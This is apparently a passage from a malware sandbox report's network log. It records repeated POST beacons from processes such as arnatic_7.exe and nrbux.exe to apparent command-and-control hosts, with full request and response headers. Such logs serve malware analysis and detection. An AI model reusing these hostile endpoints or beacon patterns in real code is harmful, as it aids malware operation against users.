                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861efe3b247cee-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:16 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b1db3900001ba5a7034000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lHQ1iiKh3X4T5BgmX7xwrCPM0K171wKZqOHAAIEISq30e9CWRMYLHUI2Ut3XOKQATomPwEJeWv8PhNXKFyB6QdZJY5XGUkXrZru1y7OqjuahmpWlzrkEhI2hAB39Og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861f3ece951ba5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:27 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b20423000009d2ea37b000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=WKIYXskTOgL8NIz3fron%2BY3ce90TYN0txTL5qsAUc3YmTuaTaU14AZQJDgwlqPVGMujJ%2FPGkcjUokdLws4FyCXesztWoiyws3QzfplPpjT6yZ5qwHqw1hvq66mLIfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861f803a3b09d2-MIA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:37 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b22d950000228d57979000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2XGOoBSb4ENAeIM7wIYIbDTWCBIVoRM7D4iMkrl1MkVsvqCZWySY6DRx%2BreI%2F74UFTlb3jp9LeiGdomzEPLf%2F7EOA323Zk6Tx4Vn5vzIKFMt1UAEHdu2mLqDTLorHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861fc288ef228d-MIA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:48 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b255ce00001e5d212e8000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=XZjLU8XYzO38pqXBIk1jVSAxNa8OR3EEJDEfgYYm%2BQv8Zy1HwATj%2BFMJiOtwJK4NQ9%2BR2wdmaapoZPcKA0i5lIDG71314i9dVecv5KSFw6w4NahWTo3z%2FlR6rXFCvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862002edf21e5d-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:58 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b27db700001e61bb9c8000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=anjNrm58r91Ck0utKPc3Bb21ckZQzvqXbQARwfcbuoiBrv9AxTGPIw4ABT4P5FFhfcGwvZkyeuL1jqgkaV6RIAe4R%2FWHgWjQZlmm%2FOAgu%2Bj%2FR30RiXzcldwJ6U5TeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862042b9d91e61-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:08 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b2a5d200004be82a236000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=nAteczHbk%2BGqgLNkXQRZQ6Jz5ZbEd3%2B1h6jglXha%2B1nwytO8hGY8pjhvJu%2B6Nh4s96BNaOYJKNBXP20IQyb1j7k%2BoYRxX5GnQzuE1%2BQjg4xowZg3OwNBNFcc0fc%2Fyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862082e81e4be8-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:18 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b2ce210000164996af1000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7s0xjmLU5CqUQA2ii2Ms8x9yVjKvk%2BanxoP5WztynECbmZvsxooi0gos3X%2B9RF3O%2BM98LTiL9OZhLvYZjjZgX9kji0qw5jaiDRQ33IKvCHjUhAn%2BePXwZaj1cWfU9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668620c36f051649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:29 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b2f83e00000575ed208000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TZZsCGOeXpX187syVFsdHKnhGx9KzgrcGfXI7TeErgMiSNI4b2LrfeQBTIIrwzkRnZYDkaOs1a2KtzOPIFG6X9ZPLxMJgiglaL5YgBac0BehvaEF%2FApuT7tJGjkEcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862106cce10575-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:40 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b321010000fa4449a3f000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0t0e1dfZLOOmLAjAQJclDApZdbgwyioiITx96YHXcfKlhMDLYxpDON9hUc7vwQHY97eDjY5EwmFJ9MHkW9hmfWMytyQfxPYShzCZW%2F9%2B4hMhVnK6mtKYt505VD%2Bilg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668621480944fa44-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:23:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
